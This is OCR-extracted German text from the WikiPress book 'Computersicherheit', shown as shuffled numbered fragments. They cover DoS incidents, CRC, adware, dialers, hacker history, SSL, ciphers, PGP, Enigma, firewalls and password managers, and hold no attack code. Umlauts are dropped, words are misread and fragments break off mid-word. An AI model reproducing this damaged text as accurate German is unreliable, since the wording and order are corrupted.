159. U Braunschweig Die 25 EU Mitglieder werden k nftig beim Kampf gegen Spammer mit 13 asiatischen L ndern China Japan S d Korea und den zehn Asean Staaten zusammenarbeiten Quelle http de wikipedia org wiki Spam Historie 14 9 04 Angelegt von TobiasEgg danach bearbeitet von den Hauptautoren Elian MichaelDiederich Schaengel89 Fb78 Siehe auch L scher Steven Malkovich D Flominator FelixH Achim Raschka Mononoke Ralf Roletschek Burri simon gmx net Filzstift Raubtierkapitalist Masiat TobiasEgg T W F Stefan64 Lley JD Bruhaha Zinnmann Arbeo Wiegels Jodevin Bodo Thiesen Sypholux Thiemo Mattig Atamari Bera Vlado Neo23x0 SirJective Hashar Stefan freimark de Tody Martin M ller Michael K mmling anonym 12 1 06 1 2 06 WikiPress Redaktion 207 Angriffe Denial of Service Als DoS Angriff Denial of Service attack etwa Dienstverweigerungs angriff bezeichnet man einen Angriff auf einen Host Server mit dem Ziel einen oder mehrere seiner Dienste arbeitsunf hig zu machen In der Regel geschieht dies durch berlastung Erfolgt der Angriff koordiniert von einer gr eren Anzahl anderer Systeme aus so spricht man von ei nem DDoS Distributed Denial of Service Normalerweise werden sol che Angriffe nicht per Hand sondern mit Backdoor Programmen oder hnlichem durchgef hrt welche sich von alleine auf anderen Rechnern im Netzwerk verbreiten und dadurch dem Angreifer weitere Wirte zum Ausf
160. WIKI Aus der freien Enzyklop die Wikipedia freie ii PRESS zusammengestellt von Michael Diederich Computersicherheit WikiPress Computersicherheit Dieses Buch beschreibt kenntnisreich wie Computerviren und andere Bedrohungen des Computers funktionieren und wie man sich vor ih nen sch tzen kann Es informiert ber W rmer Trojaner die Hoax und Massenmails die regelm ig das E Mailfach berquellen lassen sowie die Phishing Versuche dreister Abzocker mit denen versucht wird den Mail lesern Passw rter f r ihre Konten zu entlocken Doch auch die Schutz m glichkeiten kommen nicht zu kurz angefangen von Virenschutzpro grammen ber Spamfilter bis hin zu Verschl sselungsmodellen f r die gefahrlose Kommunikation Michael Diederich wurde am 11 Mai 1983 in Duisburg geboren und hat seine Schulzeit in Baden W rttemberg mit der fachgebundenen Hoch schulreife beendet Nach einem viermonatigem Auslandsaufenthalt stu diert er jetzt Wirtschaftsinformatik an der Fachhochschule Furtwangen Er interessiert sich f r Sicherheit in Computersystemen Webapplikatio nen und ist Mitglied im Chaos Computer Club Computersicherheit Technik Methoden Schutz Aus der freien Enzyklop die Wikipedia zusammengestellt von Michael Diederich WikiPress 7 Ver ffentlicht in der Zenodot Verlagsgesellschaft mbH Computersicherheit Technik Methoden Schutz Aus der freien Enzyklop die Wikipedia zusammengestellt von Michael Diede
161. Weiteren muss der Empf nger dasselbe CRC Polynom und Rechenver fahren benutzen wie der Sender Und schlie lich muss der Empf nger die Information besitzen wo im Datenstrom sich die zus tzlich zu den Daten bertragene Pr fsumme befindet Beispiel Es folgt ein Beispiel mit einem Code 9 ten Grades Das Generatorpolynom lautet 10011 1x Ox Ox 1x 1x und ist somit 4 ten Grades Der zu bertragenden Bitfolge Rahmen engl frame genannt wird eine Kette aus Nullen entsprechend des Grades des Generatorpolynoms angeh ngt Rahmen mit Anhang Generatorpolynom 10011 Rahmen 1101011011 Rahmen mit Anhang 11010110110000 das Generatorpolynom hat r Stellen also werden r 1 Nullen erg nzt hier ist r 5 Nun wird der Rahmen mit Anhang von links her durch das Generator polynom dividiert Dabei wird ausschlie lich das exklusive OR XOR verwendet Wenn man stellenweise dividiert wird also aus 11010 durch 10011 01001 0 xor 0 0 0 xor 1 1 1 xor 0 1 1 xor 1 0 Es folgt das vollstandige Beispiel 11010110110000 10011 lt immer mit der ersten gemeinsamen 1 anfangen auch wenn der Rahmen z B mit 1000 beginnen w rde und somit kleinwertiger w re als das Generatorpolynom 10011 10011 000010110 10011 010100 10011 01110 Rest 260 Zyklische Redundanzpr fung Die vorher angeh ngte Null Kette wird nun durch den Rest ersetzt bertragener Rahmen 11010110111110 Diese Nachricht kann jetzt z B ber ein N
162. Werbebanner oder Werbe Popups zeigt Diese Werbeein blendungen lassen sich normalerweise nicht abschalten und sind meist immer sichtbar Durch Vermarktung dieser Werbefl chen wird die Ent wicklung der Software finanziert Oft gibt es auch eine Option gegen Be zahlung eine werbefreie Vollversion zu erhalten Strittig ist ob Adware automatisch als Spyware zu bezeichnen ist Zwar wird von manchen werbefinanzierten Programmen nur wenig In formation preisgegeben alleine die Verbindungsdaten erlauben jedoch bereits vielf ltige R ckschl sse ber Nutzungsverhalten und sind aus Da tenschutzgr nden problematisch Allerdings gibt es auch eine Software Reihe der Firma frevel amp fey die seit Anfang der 1990er Jahre ihre Software f r Verlage und Medien Unter nehmen unter dem Markennamen adware entwickelt und vertreibt lange bevor der Begriff Adware f r werbefinanzierte Software verwendet wurde Quelle http de wikipedia org wiki Adware Historie 20 1 04 Angelegt von LosHawlos danach bearbeitet von den Hauptautoren LosHawlos Hausmeistah AndreasE Ctulhu Bert2 Serpens Bierdimpfl Sicherlich Melancholie anonym 12 1 06 1 2 06 WikiPress Redaktion 107 Software Dialer Dialer deutsch Einwahlprogramme sind im engeren Sinne Computer programme mit deren Hilfe ber das analoge Telefon oder das ISDN Netz eine Verbindung zum Internet oder zu anderen Computernetzwer ken aufgebaut werden kann So ist bei vielen Betriebssy
163. Wissen hacken und sich selbst Hacker Bereits in diesen ersten Jahren verfassten sie fiir sich einen Kodex der allerdings damals noch nicht ganz so ernst genommen wurde wie es sp ter der Fall war die Hackerethik Als Mitglieder des Modellbahnklubs damit begannen mit einem DEC PDP 1 Computer zu arbeiten wurde ihr Slang nun auch in schriftlicher Form auf den Compu ter bertragen Die zuerst bekannte Verwendung des Begriffs Hacker wurde auf diese Weise von der Ausgabe des Studentenpapiers vom 20 No vember 1963 der technischen Fachschule des MIT registriert Ende der 1960er stand der Begriff Hacker bereits weltweit als Synonym f r jemanden der sich intensiv mit dem Computer besch ftigt 1972 er ffnete John T Draper auch bekannt als Captain Crunch durch seine Publikation eines Tonwahlsignals die ra des kostenlosen Telefo nierens Das war ein bemerkenswerter Hack welcher die erste markante Assoziation zwischen dem Begriff Hacken und dem berwinden von Si cherheitsbarrieren darstellt Dessen ungeachtet wurde der Begriff Hacker in den 1970ern bis An fang der 1980er als Bezeichnung f r einen au ergew hnlich guten Pro grammierer gepr gt Davon abgeleitet gleicht das Wort innerhalb der Programmierer und Hackerszene auch heute noch einem Rang Es zeugt von Respekt und stellt eine Auszeichnung f r au ergew hnlich gute F higkeiten dar welche nicht vorschnell verliehen wird Demgegen ber wer den auf den Programmcode
164. Zukunftssicherheit bei den verwendeten Verschl sselungstechniken zu gew hrleisten 319 Kryptografie SSL Protokolle in der bersicht Das SSL Protokoll besteht aus zwei Schichten layers SSL Handshake SSL Change SSL Alert Protocol SSL Application Data Protocol Cipherspec Protocol Protocol SSL Record Protocol SSL Record Protocol Das SSL Record Protocol ist die untere der beiden Schichten und dient der Absicherung der Verbindung Es setzt direkt auf der Transportschicht auf und bietet zwei verschiedene Dienste welche einzeln und gemeinsam genutzt werden k nnen Ende zu Ende Verschl sselung mittels symmetrischer Algorithmen Der verwendete Schl ssel wird dabei im Voraus ber ein weiteres Pro tokoll z B das SSL Handshake Protocol ausgehandelt und ist einmalig f r die Verbindung SSL unterst tzt f r die symmetrische Verschl sse lung u a DES und Triple DES Sicherung der Nachrichten Integrit t und Authentizit t durch Bildung einer kryptografischen Pr fsumme SSL Handshake Protocol Das SSL Handshake Protocol baut auf dem SSL Record Protocol auf und erf llt die folgenden Funktionen noch bevor die ersten Bits des Applikationsdatenstromes ausgetauscht wurden Identifikation und Authentifizierung der Kommunikationspartner auf Basis asymmetrischer Verschl sselungsverfahren und Public Key Kryptografie Dieser Schritt ist optional F r gew hnlich authentifi ziert sich aber zumindest der Server gegen ber dem Clien
165. a Encryption Standard oder Lucifer bis zum Oktober 2000 der Verschliisselungsstandard der USA Lucifer das Verfahren wurde 1974 von IBM entwickelt Die Version f r Privatanwender hei t Data Encryption Algorithm DEA Triple DES eine Weiterentwicklung des DES Verfahrens dreimal langsamer aber um Gr enordnungen sicherer IDEA International Data Encryption Algorithm ein 1990 an der ETH Z rich entwickeltes Blockverschl sselungsverfahren Software patentiertiert von Ascom Systec Anwendung in PGP Blowfish 1993 von Bruce Schneier entwickeltes Blockverschl sse lungsverfahren unpatentiert Twofish Blockverschl sselungsverfahren vom Counterpane Team wird u a in Microsoft Windows eingesetzt CAST 128 CAST 256 Blockverschl sselungsverfahren von Carlisle M Adams RC2 RCA RC5 RC6 Rivest Cipher mehrere Verschl sselungs verfahren von Ronald L Rivest Quelle http de wikipedia org wiki Symmetrisches_Kryptosystem Historie 19 5 03 Angelegt von Vanis danach bearbeitet von den Hauptautoren Kku Vanis Stern Janusbs0l Meph666 Bluec Warp Steven Malkovich Zwobot Fgb Fristu Priwo Bmr RobotE anonym 12 1 06 1 2 06 WikiPress Redaktion Asymmetrisches Kryptosystem Ein asymmetrisches Kryptosystem ist ein Kryptosystem das im Gegen satz zu einem symmetrischen Kryptosystem verschiedene Schl ssel zur Ver und Entschl sselung verwendet Prinzip Das asymmetrische Verfahren wird F auch als Public Key Verfa
166. a dem ehemaligen PGP Freeware entspricht Ver und Entschl sselung von E Mails ist auch nach Ablauf der Testphase m glich aber nur f r nicht kommerzielle Zwecke zul s sig Aufgrund der Tatsache dass der Quelltext von PGP zeitweilig nicht offengelegt wurde und Features implementiert wurden welche die automatische Verschl sselung an einen weiteren Empf nger erm g lichten wurde bis 1998 der OpenPGP Standard entwickelt Das unter der GNU GPL stehende Programm GnuPG war urspr nglich die erste Implementation von OpenPGP und wurde als freie Alternative zu PGP entwickelt Mittlerweile folgt auch PGP dem OpenPGP Standard fast vollst ndig so dass es kaum noch zu Problemen beim Austausch von Daten kommt Quelle http de wikipedia org wiki Pretty_Good_Privacy Historie 27 1 03 Angelegt von Urbanus danach bearbeitet von den Hauptautoren zzz Urbanus Strunker J Schmitt Kubieziel Hagbard HoSe Zwobot Stw Stern Steven Malkovich Obersachse Pit Cyper Jed UsagiYojimbo Volty 217 BWBot MaKoLine Baffclan Priwo anonym 12 1 06 1 2 06 WikiPress Redaktion Web of Trust Netz des Vertrauens bzw Web of Trust ist in der Kryptologie die Idee die Echtheit von digitalen Schliisseln durch ein Netz von gegenseitigen Be st tigungen Signaturen zu sichern Es stellt eine dezentrale Alternative zum hierarchischen PKI System dar Kuna indirektes indirektes i H i H H direktes direktes i H t Vertrauen Vertr
167. achrichtenverkehr dieser Staaten zu mitzulesen Verbesserungspotenzial Schon 1883 formulierte der niederl ndische Kryptologe Auguste Kerck hoffs unter der Annahme Der Feind kennt das benutzte System seine f r seri se Kryptografie bindende Maxime Die Sicherheit eines Kryptosystems darf nicht von der Geheimhaltung des Algorithmus abh ngen Die Sicherheit gr ndet sich nur auf die Geheim haltung des Schl ssels Kerckhoffs Prinzip 313 Kryptografie Die kryptografische Sicherheit der Enigma hing im Widerspruch zu Kerckhoffs Maxime wesentlich von der Geheimhaltung ihrer Walzen verdrahtung ab Diese war unver nderbar somit ein Teil des Algorithmus und nicht des Schl ssels Bemerkenswert ist dass die Walzenverdrahtung seit den Anf ngen in den 1920er Jahren bis 1945 niemals ver ndert wur de Unter den blichen Einsatzbedingungen einer so weit verbreiteten Schl sselmaschine wie der Enigma darf man nicht annehmen dass deren algorithmische Bestandteile auf Dauer geheim gehalten werden k nnen auch wenn die Deutschen es versucht haben Eine erste M glichkeit zur Verbesserung der Enigma w re somit das beispielsweise j hrliche vollst ndige Auswechseln des Walzensortiments gewesen Noch wesentlich wirkungsvoller w ren Walzen deren innere Verdrahtung schl sselabh ngig variabel gestaltet werden k nnte Interes santerweise gab es hierzu einen Ansatz n mlich die Umkehrwalze D die genau diese Eigenschaft aufwies
168. afiken und Collagen von Ute Scharrer GFDL au er Lap topcollage Ralf Roletschek GFDL Enigma Bob Lord GFDL KlamAV Logo clamav Team GPL Frau am Laptop Matthew Bowden Copyleft Gestaltung Zenodot Verlagsgesellschaft mbH Umschlaggestaltung Ute Scharrer Druck und Bindung GGP Media GmbH P neck Printed in Germany ISBN 10 3 86640 007 1 ISBN 13 978 3 86640 007 8 Vorwort Dieses Buch berblick Computersicherheit Datenschutz Datensicherheit Viren W rmer Trojaner Malware Computervirus Angarsk Bootvirus Form Virus Linkvirus Makrovirus TSR Virus Handyvirus CIH Virus Computerwurm Loveletter Sobig F Mydoom Sasser W32 Blaster Trojanisches Pferd Software Antivirenprogramm AntiVir Botnet Keylogger Rootkit Spamfilter Firewall Inhalt 11 11 14 20 21 21 22 44 45 46 46 47 47 48 49 50 62 64 65 68 70 72 76 76 79 82 82 83 85 87 Personal Firewall Spyware Adware Dialer Palladium Next Generation Secure Computing Base Trusted Platform Module Kopierschutz 94 106 107 108 113 114 117 120 Trusted Computing Patfonin Alliance 122 Trusted Computing Gip 123 Digital Rights Management 127 PGP und Zertfikate Platform for Privacy Preferences Pretty Good Privacy Web of Trust Public Key Infrastruiktun 142 149 150 152 Digitales Zertifikat u X 509 Zeriifikatsperi
169. ail Literatur Ammann Thomas Lehnhardt Matthias Mei ner Gerd Stahl Stephan Hacker fiir Moskau 1 Auflage Rowohlt Verlag 1989 ISBN 3 8052 0490 6 Curic A Computer Hacker Pioniere Lingen Verlag 1995 Gr ndahl Boris Hacker Hamburg 2000 ISBN 3 434 53506 3 Hafner Katie Markoff John Cyberpunk Outlaws and Hackers on the Computer Frontier Revised Simon amp Schuster 1995 ISBN 0 684 81862 0 Himanan Pekka Die Hacker Ethik Miinchen 2001 ISBN 3 570 50020 9 Koch Egmont R Sperber Jochen Die Datenma fia Rowohlt Verlag 1996 ISBN 3 499 60247 4 Levy Steven Hackers Heroes of the Computer Revolution Doubleday 1984 Penguin Books New York 1994 ISBN 0 14 100051 1 Medosch Armin R ttgers Janko Netzpiraten Die Kultur des elek tronischen Verbrechens Verlag Heinz Heise 2001 ISBN 3 88229 188 5 Mitnick Kevin D Simon William L Die Kunst der T uschung 1 Auflage mitp Verlag 2003 ISBN 3 8266 0999 9 Moody Glyn Rebel Code Allen Lane 2001 Pen guin Books 2002 ISBN 0 14 029804 5 Sen Evrim Hackertales Geschichten von Freund Feind 1 Auflage Tropen Verlag 2002 ISBN 3 932170 38 5 Quelle http de wikipedia org wiki Hacker Historie 29 9 02 Anonym angelegt danach bearbeitet von den Hauptautoren NeonZero Elian Christoph Neuroth ShiningBase Steven Malkovich Diddi Marti7D3 Kaemmi Rasterzeileninterrupt MichaelDiederich Proggy Guizza Slick FutureCrash Xeper Hagbard M
170. akkreditiert oder nicht akkreditiert sein Eine Zertifizierungsstelle die das Akkreditierungverfahren gem SigG erfolgreich durchlaufen hat wird als akkreditiert eingestuft und darf gem 15 Abs 1 Satz 3 SigG ein entsprechendes G tesiegel tragen Die Zertifizierungsstellen werden von Best tigungsstellen derzeit drei Stand Oktober 2005 auf technische Sicherheit und langfristige Eignung um fassend gepr ft Bei akkreditierten Zertifizierungsstellen ist durch die Bundesnetzagentur ehemals RegTP sichergestellt dass selbst bei Be triebseinstellung der Zertifizierungsstelle die Unterschriften Zertifikate weiterhin durch alle Beteiligten pr fbar bleiben Wichtig ist dies vor al lem da viele Dokumente in Papier oder elektronischer Form per Gesetz viele Jahre aufbewahrt werden m ssen W ren Unterschriften nach Jah ren nicht mehr pr fbar h tte dieses fatale Folgen Ausstellung eines Zertifikates durch ein Web of Trust Mitglied Die Verschl sselungssoftware PGP und die OpenSource Variante Gnu Privacy Guard nutzen ebenfalls Zertifikate Diese bestatigen die Echtheit und Unverfalschtheit der zertifizierten Schliissel PGP und GnuPG basie ren auf OpenPGP und sind kompatibel zueinander Ein Zertifikat kann von jedem Benutzer Web of Trust Mitglied erzeugt werden Glaubt ein Benutzer daran dass ein ffentlicher Schl ssel tats chlich zu der Person geh rt die ihn ver ffentlicht so erstellt er ein Zertifikat indem er diesen
171. ale zugunsten der Codeknacker oft auch mit viel Gl ck wie Welchman in seinem Buch einr umt We were lu cky Die Betrachtung alternativer Geschichtsverl ufe ist gezwungenerma en h chst spekulativ Entscheidend ist nat rlich auch der Zeitpunkt zu dem die Enigma m glicherweise einbruchssicher gemacht worden w re Falls dies erst im Jahre 1945 geschehen w re h tte es vermutlich nur ge ringe Konsequenzen auf den Kriegsverlauf gehabt Im Jahr 1944 dagegen w ren die alliierten Invasionspl ne behindert worden Wie man heute wei war aus entzifferten Enigma Funkspr chen nahezu die gesamte deutsche Gefechtsaufstellung in der Normandie bekannt Was aber w re gewesen wenn die Enigma von Anfang an unknackbar geblieben w re Im Jahre 1940 beispielsweise setzte die Royal Air Force ihre letzten Reserven ein um schlie lich die Luftschlacht um England 312 Enigma The Battle of Britain zu gewinnen Auch hierbei waren entzifferte Funk spr che insbesondere ber die Angriffspl ne der deutschen Luftwaffe eine gro e Hilfe Ohne diese Hilfe w re die Luftschlacht eventuell ver loren worden und das Unternehmen Seel we also die deutsche Invasion Englands h tte stattgefunden Wie es ausgegangen w re dar ber l sst sich nur spekulieren Denkbar w re dass nach einer deutschen Besetzung Englands noch im Jahr 1940 der Krieg beendet gewesen w re denn zu diesem Zeitpunkt befanden sich weder die Sowjetunion noch die Verei nigt
172. an derem das Spiel Final Fantasy XI l uft der Firma Square Enix ist Ziel eines DDoS Angriffs Januar Februar 2005 Ein aktiv gesteuerter DoS Angriff legt in meh reren Angriffswellen das Online Angebot des Heinz Heise Verlags f r zwei Tage teilweise lahm Der Zeitschriften Verlag stellt Strafanzeige und setzt eine Belohnung in H he von 10 000 Euro f r sachdienliche Hinweise aus die zur Ergreifung des T ters f hren Dezember 2004 DDoS gegen Amazon com und diverse Bittorrent Websites Oktober 2004 DDoS gegen diverse Websites der holl ndischen Regierung September 2004 DDoS u a gegen Symantec August 2004 DDoS gegen DoubleClick dialerschutz de computer betrug de Juli 2004 DDoS gegen Boinc SETI Betfair mybet com Februar 2004 Der E Mail Wurm Mydoom bringt die Website der Fir ma SCO zum Erliegen August 2003 Der E Mail Wurm Lovsan W32 Blaster soll die Up date Site der Firma Microsoft unerreichbar machen wird jedoch durch Deaktivierung des Domainnamens ins Leere gef hrt Mai 2001 drei Tage andauernde DDoS Attacke gegen das CERT CC Computer Emergency Response Team Coordination Center Februar 2000 Verschiedene gro e Internet Dienste wie z B Yahoo CNN Amazon de Ebay werden durch DDoS Attacken lahm gelegt Hierbei haben sich die Angreifer Zugang zu hunderten von Compu tern im Internet verschafft darum das distributed also verteilt um die Wirksamkeit ihrer Attacken durch die Vielzahl der gleichzeitig angre
173. an le diglich einen P3P Agenten der kostenlos im Netz erh ltlich ist F r den Surfer komfortabler sind P3P kompatibele Browser In den folgenden Browsern sind P3P Agenten bereits integriert Mozilla ab Version 1 4 Netscape Navigator ab Version 7 0 Microsoft Internet Explorer ab Version 6 0 AT amp T Privacy Bird JRC Proxy Au erdem gibt es P3P Agenten als Browser Plugins Privacyfox f r Mozilla Firefox Hat der Surfer einen P3P Agenten kann er festlegen wie mit seinen Da ten im Internet umgegangen werden soll Die Datenschutzvorstellung bei spielsweise zum Umgang mit Cookies wird durch die pers nlichen Ein stellungen im P3P Agenten automatisch ins P3P Format bersetzt Vor Besuch einer Website werden dann die Angaben des Surfers mit denen des Anbieters einer Homepage verglichen Anbieter m ssen zuvor ihre Da tenschutzerkl rung auf dem Webserver in Textform und im P3P Format bereitgestellt haben F r Anbieter von Diensten und Homepages im Internet ist P3P eben falls kostenlos Es sei denn eine kostenpflichtige Datenschutzberatung kommt hinzu und es wird zus tzlich ein P3P G tesiegel beantragt F r 133 PGP und Zertfikate Unternehmen k nnte die Beteiligung an P3P einen Wettbewerbsvorteil darstellen weil datenschutzbewusste Nutzer dadurch erfahren dass sich der Anbieter mit Fragen des Datenschutzes auseinandergesetzt hat Dar ber hinaus wird die Datenschutzerkl rung in einer verst ndlichen Form auch f r a
174. annten Klardaten verglichen werden 274 Kryptoanalyse Adaptive Chosen Plaintext Differentielle Kryptoanalyse hnlich dem vorhergehenden Angriff Der Angreifer hat l ngere Zeit Zugang zu einem Verschl sselungssystem und kann sich immer wieder frei gew hlte Klartexte verschl sseln Insbesondere kann er nach der Analyse des er haltenen Kryptotextes je nach Ergebnis gezielt einen neuen Klartext zum Verschl sseln w hlen daher adaptiv Adaptive Chosen Ciphertext hnlich zum vorhergehenden Angriff allerdings hat der Angreifer l ngere Zeit Zugang zum System und kann nach jeder Analyse gezielt einen neuen Kryptotext zum Entschl sseln w hlen Chosen Text Kombination aus Chosen Plaintext und Chosen Ciphertext Adaptive Chosen Text Kombination aus Adaptive Chosen Plaintext und Adaptive Chosen Ciphertext Side Channel Der Angreifer versucht au er dem Klartext den Chiffren oder dem Schl ssel zun chst auch andere Daten zu erfassen zum Beispiel Dauer der Verschl sselung zeitlicher Verlauf des Stromverbrauchs eines Chips und daraus Informationen ber den verwendeten Algorithmus und Schl ssel zu gewinnen Lineare Kryptoanalyse Diese Methode wurde 1993 von Mitsuru Matsui ver ffentlicht Das Verfahren basiert auf der linearen Ann herung an den wahrscheinlichsten Schl ssel zum Brechen von Blockverschl sselungs verfahren Literatur Poe Edgar Ellen Der Goldk fer Erz hlung von 1843 in der eine Gehe
175. ar Springer ISBN 0 387 02620 7 Schumacher Markus Hacker Contest Xpert press ISBN 3 540 41164 X Stoll Clifford Kuckucksei Die Jagd auf die deutschen Hacker die das Pentagon knackten Fischer Taschenb cher ISBN 3 596 13984 8 Quelle http de wikipedia org wiki Computersicherheit Historie 3 10 01 Anonym angelegt danach bearbeitet von den Hauptautoren Dsl 213 023 062 043 arcor ip net Kubieziel Trixium Duesentrieb Liquidat Steven Malkovich Stf MichaelDiederich Bjoern h GerhardG Gwe S K Wiegels Density Zwobot Stw Euripides Vulture Kku Ben Zin Spauli Hella Achim Raschka Maixdorff FlaBot Jkirschbaum Yas Dishayloo anonym 12 1 06 1 2 06 WikiPress Redaktion Datenschutz Datenschutz bezeichnete urspr nglich den Schutz personenbezogener Daten vor Missbrauch Der Begriff wurde gleichgesetzt mit Schutz der Daten Schutz vor Daten oder auch Schutz vor Verdatung Im englischen Sprachraum spricht man von privacy Schutz der Privatsph re und von data privacy Datenschutz im engeren Sinne Im europ ischen Rechts raum wird in der Gesetzgebung der Begriff data protection verwendet Heute wird der Zweck des Datenschutzes darin gesehen den Einzel nen davor zu sch tzen dass er durch den Umgang mit seinen personen bezogenen Daten in seinem Recht auf informationelle Selbstbestimmung beeintr chtigt wird Datenschutz steht f r die Idee dass jeder Mensch grunds tzlich selbst entscheiden kann wem wann welch
176. ass f r jeden Teil nehmer ein Schl sselpaar generiert wird Ein Schl ssel jedes Paars wird ver ffentlicht der andere bleibt geheim Die Asymmetrie ergibt sich weil ein Schl ssel eines Paars immer nur ver und der andere immer nur entschl s seln kann Das bekannteste dieser Verfahren ist das RSA Kryptosystem 282 Verschl sselung Verschl sselungsoperationen Man unterscheidet zwei grundlegende Verschl sselungsoperationen die einzeln oder in Kombination eingesetzt werden k nnen um Nachrichten zu verschl sseln Transposition Bei einer Transposition werden die Zeichen unterein ander vertauscht Zum Beispiel wird der Text r ckw rts geschrieben oder man vertauscht jeden 2 mit jedem 5 Buchstaben Substitution Bei der Substitution werden Zeichen durch andere ersetzt Zum Beispiel werden alle Buchstaben durch Zahlen ersetzt Verschl sselungsmodi Wenn Verschl sselungen bei derselben Klartext Eingabe immer zu den selben Geheimtexten f hren erh ht sich die Wahrscheinlichkeit der Ver schl sselung durch analytische Verfahren auf die Spur kommen zu k n nen Man unterscheidet daher die folgenden Verschl sselungsmodi Electronic code book ECB Aus einem Klartextblock wird immer der selbe Geheimtext erzeugt Cipher block chaining CBC In die Verschl sselung flie t der jeweils vorher verschl sselte Block ein Cipher Feedback CFB Output Feedback OFB Insgesamt f hrt dabei auch CBC bei identischer Klartext Einga
177. ass sein Einsatz sich nur in wenigen speziellen F llen lohnen w rde Zudem sollte das System nach einer bestimmten Zahl von fehlerhaften Eingaben keine neuen Eingaben akzeptieren bis eine bestimmte Zeit ver gangen ist bzw das System manuell wieder freigeschaltet wurde Windows Programme zur Passwortverwaltung Das c t magazin empfiehlt regelm ig die Open Source Programme Pass word Safe und KeePass f r die sichere und komfortable Passwortverwal tung und speicherung unter Windows Password Safe wurde urspr ng lich von dem Kryptografie Experten Bruce Schneier entwickelt Aktuelle 289 Kryptografie Version von Password Safe 2 15 vom 29 Dezember 2005 Die aktuelle Version von KeePass ist 1 04 vom 02 Januar 2006 Linux Programme zur Passwortverwaltung Unter Linux bietet sich das Programm KWallet zur Passwortverwaltung an Dieses Programm ist in KDE ab Version 3 4 standardm ig enthal ten Es arbeitet eng mit dem E Mail Client KMail und dem Webbrowser Konqueror zusammen so dass von Webseiten oder von E Mail Servern abgefragte Passw rter automatisch bertragen werden k nnen sobald die digitale Brieftasche einmal ge ffnet ist Aber auch andere Passw rter und beliebige Schl ssel Wert Paare lassen sich bequem und sicher direkt mit KWallet verwalten Alternativ existiert auch eine Linux Version des bereits erw hnten Windows Passwortmanagers KeePass mit dem Namen KeePass L Ein weiteres Programm
178. assung im Sinne einer Normali sierung oder definierten Beschr nkung der bertragenen Protokollkom munikation zur Reduktion der Angriffsfl che auf der Applikationsebene oder dem gezielten Sperren bestimmer Protokolltransaktionen z B ge zielte Verhinderung von Port Mode FTP Firewallsysteme unterscheiden sich stark in der Anzahl und Art der von Proxies unterst tzten Proto kolle FTP DNS HTTP SMTP SQL Net POP3 MS RPC usw sowie ggf vorhandenen Konfigurationsm glichkeiten f r diese Proxies Ohne Proxy Konzept sind die M glichkeiten der Protokollnormalisierung sehr begrenzt da ein aktives Eingreifen in den Datenstrom sich auf Verbin dungsabbruch Blacklisting beschr nkt Viele Firewalls mit Proxy k nnen dar ber hinaus Protokolloptionen anpassen etwa in einer SMTP Trans aktion kein BDAT VRFY o zulassen Application Level Firewall Ist eine Firewall welche auf Schicht 7 Ap plikationsschicht des ISO OSI Modells arbeitet Eine Firewall welche den Inhalt von angeforderten HTML Seiten vor der Auslieferung z B auf Viren berpr ft ist ein Beispiel f r eine Application Level Firewall Stateful Inspection Stateful Inspection zustandsgesteuerte Filterung ist eine Methode zur Erweiterung der Funktion eines Paketfilters Die Schw che eines einfachen Paketfilters ist dass jedes Paket einzeln betrach tet wird und nur anhand der Informationen in diesem einen Datenpaket entschieden wird ob es g ltig ist oder nicht Sta
179. at Der Dialer installiert sich automatisch selbst als Standardverbindung ohne dass es einen Hinweis darauf gibt Der Dialer baut selbstst ndig unerw nschte Verbindungen auf Der Dialer weist vor der Einwahl oder w hrend der Verbindug nicht auf den hohen Preis der Verbindung hin Der Dialer l sst sich gar nicht oder erst mit erheblichem Aufwand wie der deinstallieren Beim Zugriff auf Webseiten welche einem die eigene IP anzeigen in klusive des zugeh rigen Providers erscheint ein Provider mit dem man nichts zu tun hat Aktuell hat sich das Dialerproblem mehr auf Auslands bzw Satellitenzie le verlagert Der befallene PC weist kaum noch Spuren der Dialersoftware aus da fast alle Routinen nur tempor r installiert werden und beim Aus schalten verschwinden Die Zielrufnummern werden dabei aktuell aus dem Internet geladen und wechseln i d R h ufig Hier auflaufende Kos ten sollten beim rechnungsstellenden Netzbetreiber reklamiert werden da auch diese Dialereinwahlen ungesetzlich sind und eine nicht vorhandene Zahlungspflicht abgeleitet werden kann Gesetzliche Regelungen und Rechtsprechung Seit dem 15 August 2003 ist in Deutschland das Gesetz zur Bek mpfung des Missbrauchs von 0 190er 0 900er Mehrwertdiensterufnummern in Kraft getreten Dieses Gesetz beinhaltet folgende Punkte Preisangabepflicht der Anbieter Preisobergrenzen Legitimationsverfahren und automatische Tren nung Registrierung von Anw hlprogrammen Dialer
180. ationen Geheimschrift Kryptoanalyse Analyse und Bewertung der Sicherheit von Krypto verfahren gegen unbefugte Angriffe Die Verschl sselung kann dabei auf unterschiedlichen Strukturen der Sprache basieren W hrend in der fr hen Phase der Kryptologie die Co dierung Verschl sselung auf Wortebene beliebt war gewannen sp ter Chiffren Verschl sselung auf Zeichenebene an Bedeutung Auch mo derne kryptologische Algorithmen operieren entweder auf Byte also Zeichen oder sogar auf Bit Ebene Aus Performance Gr nden wird bei Software Implementierungen in der Regel eine Byte weise und bei Hard ware Implementierungen eine Bit weise Verarbeitung der Daten bevor zugt da die jeweiligen Operationen schneller sind Fr her mussten Texte m hsam von Hand ver und entschl sselt wer den Im 20 Jahrhundert wurden elektromechanische Verschl sselungs maschinen erfunden eine der bekanntesten war die deutsche Enigma Heute wird diese Arbeit von Computern bernommen Nachdem die Kryptologie fr her fast ausschlie lich f r das Milit r eine Rolle spielte h lt sie heutzutage auch Einzug in zivile Bereiche Besonders im Internet ist die sichere bertragung von Informationen wie z B Pass w rtern oder Kreditkartennummern unerl sslich geworden Aktuell verwendete starke Verschl sselungsalgorithmen z B RSA AES gelten als extrem sicher Mit ihrer Hilfe chiffrierte Daten k nnen nur mit enormem Aufwand ohne den entsprechenden Schl
